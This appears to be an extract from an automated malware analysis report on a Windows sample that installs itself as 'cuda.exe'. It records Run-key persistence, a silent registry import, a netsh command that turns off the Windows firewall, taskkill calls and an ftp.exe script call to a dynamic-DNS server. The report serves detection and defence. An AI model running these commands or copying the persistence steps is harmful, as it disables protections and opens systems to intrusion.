Technical Information
Autorun persistence (values written under the Run registry keys):
- [<HKLM>\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run] 'cuda' = '%WINDIR%\system\config\cuda.exe --auto-start'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cuda' = '%WINDIR%\system\config\cuda.exe'
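- User Account Control (UAC): listed as a system feature the sample affects; the section heading that stated how is missing from this extract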
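Processes launched (command lines as recorded; the netsh entry turns Windows Firewall off for all profiles):
- '%WINDIR%\system\config\cuda.exe'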
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\system\config\ftp.txt worldvision.serveftp.com
- '<SYSTEM32>\taskkill.exe' -t -f /im proxy.exe
- '<SYSTEM32>\taskkill.exe' -t -f /im system.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\br.bat" "
- '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off
- '%WINDIR%\regedit.exe' /i/s %WINDIR%\system\config\cuda.reg
Files referenced on disk (the original heading is missing; presumably files the sample creates):
- %WINDIR%\system\config\cuda.reg
- %TEMP%\1.tmp\br.bat
- %WINDIR%\system\config\cuda.exe
- %WINDIR%\system\config\ftp.txt
- %WINDIR%\system\config\opencl.ico
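Network activity (port 21 is FTP; the partially masked host appears to be the server named in the ftp.exe command line):
- 'localhost':1038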
- 'wo######ion.serveftp.com':21
- DNS ASK wo######ion.serveftp.com
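Window classes and names referenced (the original heading is missing; presumably windows the sample searches for):
- ClassName: 'RegEdit_RegEdit' WindowName: ''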
- ClassName: '' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''